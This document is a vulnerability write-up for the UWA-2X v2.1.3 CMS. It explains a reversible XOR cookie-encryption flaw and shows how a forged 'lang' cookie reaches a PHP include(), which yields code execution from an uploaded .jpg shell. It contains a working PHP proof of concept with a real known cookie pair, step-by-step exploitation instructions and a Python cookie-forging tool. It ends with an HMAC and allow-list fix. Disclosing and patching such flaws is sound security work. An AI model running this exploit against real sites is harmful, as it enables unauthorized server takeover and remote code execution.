UWA-2X (v2.1.3) front-end unrestricted getshell caused by a function defect
The vulnerability is in the cookie encryption function:
public static function encrypt($txt, $key = '') {
    // per-cookie random key: md5 of a number in 0..32000, i.e. 32 hex characters
    $encrypt_key = md5(mt_rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // emit the random key character, then the plaintext character XOR that key character
        $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    // the random key travels inside the output, hidden only by a second XOR with md5($key)
    return base64_encode(self::_crypt($tmp, $key));
}

public static function decrypt($txt, $key = '') {
    $txt = self::_crypt(base64_decode($txt), $key);
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
        $md5 = $txt[$i];            // key character read back out of the ciphertext
        $tmp .= $txt[++$i] ^ $md5;  // recover the plaintext character
    }
    return $tmp;
}

private static function _crypt($txt, $encrypt_key) {
    $encrypt_key = md5($encrypt_key);  // 32-character keystream, repeated over the whole input
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
Why is this the same as dede's...
We can control the cookie because the scheme is reversible: the per-cookie random key is written into the ciphertext next to each masked character, and the only thing hiding it is a second XOR with md5($key), a 32-byte keystream that repeats. Anyone holding one cookie whose plaintext they know (their own) can cancel the keystream's contribution and forge a cookie with any plaintext, without ever learning $key.
The next step is getshell. See:
/core/lib/core/App.class.php

private static function load_lang() {
    $langSet = C('LANG.NAME');
    /* detect language */
    if(C('LANG.DETECT')) {
        $_t_l = ARequest::get(C('VAR.LANG'));
        if(!empty($_t_l)) {
            $langSet = strtolower(ARequest::get(C('VAR.LANG')));
            ACookie::set('lang', $langSet);
        }
        elseif(ACookie::get('lang')) {
            // attacker-controlled: the decrypted cookie value is used as-is
            $langSet = ACookie::get('lang');
        }
        elseif(isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
            preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches);
            $langSet = strtolower($matches[1]);
            ACookie::set('lang', $langSet);
        }
    }
    define('LANG_SET', strtolower($langSet));
    /* load framework language */
    // LANG_SET is spliced straight into the include path, guarded only by is_file()
    if(is_file(PFA_PATH . '/lang/' . LANG_SET . '.lang.php')) {
        L(include PFA_PATH . '/lang/' . LANG_SET . '.lang.php');
    }
    elseif(is_file(PFA_PATH . '/lang/' . C('LANG.NAME') . '.lang.php')) {
        L(include PFA_PATH . '/lang/' . C('LANG.NAME') . '.lang.php');
    }
    ACookie::set('lang', $langSet);
}
The lang cookie value is read back and spliced straight into the path that is passed to include. So we upload a shell with a .jpg extension and then truncate the path so that the appended '.lang.php' suffix is dropped. Because the cookie value goes through decrypt() before it is used, whatever magic_quotes_gpc does to the raw cookie never reaches the decrypted plaintext, so gpc can be ignored ~
-------------------
Exploitation process:
First, register an account whose name is exactly 24 characters long. Serialized, that is s:24:"<account name>"; which is 32 characters, exactly one period of the 32-byte md5($key) keystream, so the known plaintext covers every keystream position and the cookie value can be controlled perfectly at any length.
Upload a shell with a .jpg extension.
Note its address, then read the value of the uwa_m_userid cookie. Its plaintext has the form
s:Length:"account name";
which gives a known plaintext/ciphertext pair.
Feed both into the following PoC:
<?php
// $Expressly  : known plaintext (the serialized account name)
// $Ciphertext : the matching uwa_m_userid cookie value (base64)
// $str        : value to forge ("encrypt") or cookie to decrypt ("decrypt")
function cracked($Expressly, $Ciphertext, $str, $way) {
    $Ciphertext = base64_decode($Ciphertext);
    if ($way == "decrypt") {
        $text2 = "";
        $str = base64_decode($str);
    } else {
        $text2 = "a";   // constant written as every even byte of the forged ciphertext
    }
    $xxoo = "";         // output buffer (was left uninitialised in the original PoC)
    $j = 0;
    $s = 0;
    for ($i = 0; $i < strlen($str); $i++, $s++) {
        if ($j == 32) { $j = 0; $s = 0; }   // the md5($key) keystream wraps every 32 bytes
        // C[j] ^ C[j+1] ^ known plaintext char = K[j] ^ K[j+1], the only secret we need
        $tmp = $Ciphertext[$j] ^ $Ciphertext[$j + 1];
        $tmp = $tmp ^ $Expressly[$s];
        $tmp = $tmp ^ $str[$i];
        if ($way == "decrypt") {
            $text1 = $tmp ^ $str[++$i];
        } else {
            $text1 = $tmp ^ $text2;
        }
        $xxoo = $xxoo . $text2 . $text1;
        $j = $j + 2;
    }
    if ($way == "decrypt") {
        echo $xxoo;
    } else {
        echo base64_encode($xxoo);
    }
}
$a = $_GET['a'];
$a = serialize($a);   // cookie values are stored serialized, as uwa_m_userid shows
cracked("s:24:\"a11111111111111111111111\";", "U3pRPFA/VjMHaVMsW2BWNVFlVTJWZQU1CDxZMVNgXWdUP1YwUDwHZ1QxA28OZVQ3DTlWMVVmUmJVYQxkV3ddbQ==", $a, "encrypt");
?>
This yields the final payload.
The PoC must be run with gpc disabled (otherwise $_GET['a'] arrives escaped). Whether the target site has gpc on does not matter: the cookie value is decrypted server-side before use, so escaping of the raw cookie never affects the plaintext, and gpc can be ignored ~
Set the lang cookie to that value and the PHP in the uploaded file is executed.
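The forgery that both the reversibility remark above and the exploitation steps rely on, as an added example that is not part of the original report or of UWA's code: a Python port of encrypt()/decrypt()/_crypt(), a forge() that needs only one known plaintext/ciphertext pair and no key, and a second variant that mirrors the PHP PoC's trick of writing a constant into every even byte. The server key, the target plaintext and the 24-character account name are assumptions for the demo; the known pair used in the main block is the one printed in the report.

```python
import base64
import hashlib
import random

KEYSTREAM_LEN = 32  # length of an md5 hex digest, the period of both XOR keystreams


def _crypt(data: bytes, key: str) -> bytes:
    """Port of UWA's _crypt(): XOR with md5($key) used as a repeating 32-byte ASCII keystream."""
    ks = hashlib.md5(key.encode()).hexdigest().encode()
    return bytes(b ^ ks[i % KEYSTREAM_LEN] for i, b in enumerate(data))


def encrypt(txt: bytes, key: str = "") -> str:
    """Port of UWA's encrypt(): r = md5(mt_rand(0, 32000)) is a fresh per-cookie key and the
    intermediate string is r_0, t_0^r_0, r_1, t_1^r_1, ... (r repeats every 32 plaintext chars).
    The random key therefore travels inside the ciphertext, protected only by _crypt()."""
    r = hashlib.md5(str(random.randint(0, 32000)).encode()).hexdigest().encode()
    tmp = bytearray()
    for i, t in enumerate(txt):
        rj = r[i % KEYSTREAM_LEN]
        tmp += bytes([rj, t ^ rj])
    return base64.b64encode(_crypt(bytes(tmp), key)).decode()


def decrypt(b64: str, key: str = "") -> bytes:
    """Port of UWA's decrypt(): undo _crypt(), then XOR each (key char, masked char) pair."""
    data = _crypt(base64.b64decode(b64), key)
    return bytes(data[i + 1] ^ data[i] for i in range(0, len(data) - 1, 2))


def forge(known_pt: bytes, known_ct_b64: str, new_pt: bytes) -> str:
    """Forge a valid ciphertext for new_pt from one known (plaintext, ciphertext) pair, no key.

    With K = md5(key) and r the per-cookie key:
        C[2j]   = r_j ^ K[2j % 32]
        C[2j+1] = t_j ^ r_j ^ K[(2j+1) % 32]
    Keeping C[2j] (same r_j) and XORing the old plaintext out of C[2j+1] and the new one in
    gives a ciphertext that decrypts to new_pt. The pair at position j depends only on
    j mod 32, so a known cookie covering 32 plaintext characters forges any length.
    """
    ct = base64.b64decode(known_ct_b64)
    if len(ct) != 2 * len(known_pt):
        raise ValueError("ciphertext must be twice the length of the known plaintext")
    out = bytearray()
    for j, t_new in enumerate(new_pt):
        m = j % KEYSTREAM_LEN
        if m >= len(known_pt):
            raise ValueError("known plaintext must cover 32 characters to forge beyond its length")
        out += bytes([ct[2 * m], ct[2 * m + 1] ^ known_pt[m] ^ t_new])
    return base64.b64encode(bytes(out)).decode()


def forge_fixed_even(known_pt: bytes, known_ct_b64: str, new_pt: bytes, filler: int = ord("a")) -> str:
    """The variant used by the report's PHP PoC: write a constant as every even byte, so only
    P_j = K[2j % 32] ^ K[(2j+1) % 32] = C[2j] ^ C[2j+1] ^ t_j is needed per position.
    P_j has period 16, so 16 known plaintext characters already suffice for this variant."""
    ct = base64.b64decode(known_ct_b64)
    out = bytearray()
    for j, t_new in enumerate(new_pt):
        m = j % (KEYSTREAM_LEN // 2)
        if m >= len(known_pt):
            raise ValueError("known plaintext must cover 16 characters to forge beyond its length")
        p = ct[2 * m] ^ ct[2 * m + 1] ^ known_pt[m]
        out += bytes([filler, t_new ^ filler ^ p])
    return base64.b64encode(bytes(out)).decode()


if __name__ == "__main__":
    # Known pair from the report: the uwa_m_userid cookie of a 24-character account name.
    PAGE_PT = b's:24:"a11111111111111111111111";'
    PAGE_CT = "U3pRPFA/VjMHaVMsW2BWNVFlVTJWZQU1CDxZMVNgXWdUP1YwUDwHZ1QxA28OZVQ3DTlWMVVmUmJVYQxkV3ddbQ=="
    # Hypothetical target plaintext (serialized, as the cookies are stored); the real
    # payload would be whatever lang value is meant to reach the include.
    target = b's:14:"forged-lang-v1";'
    print("forged cookie:", forge(PAGE_PT, PAGE_CT, target))
    # Full round trip with a locally chosen server key (the report's key is unknown).
    key = "local-demo-key"
    ct = encrypt(PAGE_PT, key)
    assert decrypt(forge(PAGE_PT, ct, target), key) == target
    assert decrypt(forge_fixed_even(PAGE_PT, ct, target), key) == target
    print("round trip with local key: ok")
```

Run stand-alone it prints a forged cookie for the report's known pair; the round trip at the end, with a locally chosen key, is what proves the relation. Reusing the original even bytes needs 32 known plaintext characters, the fixed-even trick only 16, which is why a 24-character name (32 characters once serialized) is the safe choice for either method.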
Solution:
Change the algorithm (use a server-side secret with an integrity check so cookies cannot be forged), or validate the decrypted value before using it, e.g. only accept a lang that names one of the files actually present in the lang directory.
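Both halves of the fix as an added example in Python (not UWA's code and not from the report): a cookie encoding that only needs integrity, so it carries an HMAC under a server-side secret instead of a reversible XOR, and an allow-list check that a lang value must pass before it can become part of an include path. The secret, the cookie layout, the tag regex and the set of available languages are all assumptions of this example.

```python
import base64
import binascii
import hashlib
import hmac
import json
import re
import secrets

# Assumed server-side secret; a real deployment loads it from config. It is never derived
# from md5('') the way _crypt() is when $key is left empty.
SERVER_SECRET = secrets.token_bytes(32)


def cookie_set(value, secret: bytes = SERVER_SECRET) -> str:
    """Encode a cookie value as urlsafe-base64(JSON) plus an HMAC-SHA256 tag over the JSON body.
    lang is not confidential, so integrity is the only property the cookie needs."""
    body = json.dumps(value, separators=(",", ":")).encode()
    tag = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(body).decode() + "." + tag


def cookie_get(raw: str, secret: bytes = SERVER_SECRET):
    """Return the decoded value only if the tag verifies; None for anything else.
    A forged or tampered cookie is rejected here, before any business code sees it."""
    try:
        b64, tag = raw.rsplit(".", 1)
        body = base64.urlsafe_b64decode(b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(body)


# Assumed shape of a language tag: two lowercase letters, optionally "-" and two more.
LANG_RE = re.compile(r"^[a-z]{2}(-[a-z]{2})?$")


def resolve_lang(requested, available, default: str) -> str:
    """Allow-list the language before it is used in a file path: it must be a string,
    match the tag pattern, and name a language that actually exists; otherwise use default."""
    if isinstance(requested, str) and LANG_RE.match(requested) and requested in available:
        return requested
    return default


def lang_file(lang_dir: str, requested, available, default: str) -> str:
    """Build the path that load_lang() would include, from an allow-listed tag only."""
    return f"{lang_dir}/{resolve_lang(requested, available, default)}.lang.php"


if __name__ == "__main__":
    available = {"en", "zh-cn"}  # constructed: stems of the <tag>.lang.php files on disk
    cookie = cookie_set("en")
    print("cookie:", cookie)
    print("include:", lang_file("/app/lang", cookie_get(cookie), available, "en"))
    # A tampered tag fails verification; a traversal string falls back to the default.
    flip = "0" if cookie[-1] != "0" else "1"
    print("tampered:", cookie_get(cookie[:-1] + flip))
    print("traversal:", lang_file("/app/lang", "../../uploads/shell.jpg", available, "en"))
```

The two checks are independent on purpose: the HMAC stops anyone from minting a lang cookie, and the allow-list stops a bad value from reaching include even if it arrives through the GET parameter or Accept-Language path instead of the cookie.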